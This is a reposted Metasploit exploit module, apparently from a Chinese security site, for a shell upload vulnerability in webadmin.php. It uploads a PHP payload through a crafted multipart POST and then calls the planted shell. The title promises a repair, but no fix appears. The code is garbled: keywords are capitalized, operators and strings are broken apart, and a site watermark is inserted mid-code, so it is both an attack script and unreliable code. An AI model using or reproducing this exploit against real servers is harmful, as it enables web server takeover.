Webadmin & lt; = Shell upload defect and repair

Title: webadmin <= Shell Upload Vulnerability (MSF)
Author: Caddy-Dz www.2cto.com
: Http://wacker-welt.de/webadmin/webadmin.php.gz
Require 'msf/core'
 
Class Metasploit3 <Msf: Exploit: Remote
Rank = GreatRanking
 
Include Msf: Exploit: Remote: Tcp
Include Msf: Exploit: Remote: HttpClient
 
Def initialize (info = {})
Super (update_info (info,
'Name' => 'webadmin <= Shell Upload Vulnerability ',
'Description' => % q {
This module exploits an arbitrary shell upload vulnerability in
The webadmin. php
},
'Author' => ['caddy-dz'],
'License '=> MSF_LICENSE,
'References '=> ["http://wacker-welt.de/webadmin/webadmin.php.gz"],
'Privileged' => false,
'Payload' =>
{
'Disablenops' => true,
},
'Platform' => 'php ',
'Arch '=> ARCH_PHP,
'Targets' => [['automatically ', {}],
'Defaulttarget' => 0,
'Disclosuredate' => 'sept 13,201 1'
))
 
Register_options ([
OptString. new ('uri ', [true, "Path to webadmin", "/"]),
], Self. class)
End
 
Def exploit
Boundary = rand_text_alphanumeric (6)
Fn = rand_text_alphanumeric (8)
Data = "-- # {boundary} \ r \ nContent-Disposition: form-data; name = \" Filedata \";"
Data <"filename = \" # {fn}. php \ "\ r \ nContent-Type: application/x-httpd-php \ r \ n"
Data <payload. encoded
Data <"\ r \ n -- # {boundary }--"
 
Res = send_request_raw ({
'Url' => datastore ['url'] + "/webadmin. php ",
'Method' => 'post ',
'Data' => data,
'Headers' =>
{
'Content-type' => 'multipart/form-data; boundary = '+ boundary,
'Content-length' => data. Length,
}
}, 25)
 
If (res)
Www.2cto.com print_status ("Successfully uploaded shell .")
Shell_path = res. body. split ("_") [0]
Print_status ("Trying to access shell at # {shell_path }...")
Res = send_request_raw ({
'Url' => datastore ['url'] + shell_path,
'Method' => 'get ',
}, 0.01)
 
Else
Print_error ("Error uploading shell ")
End
 
Handler
End
End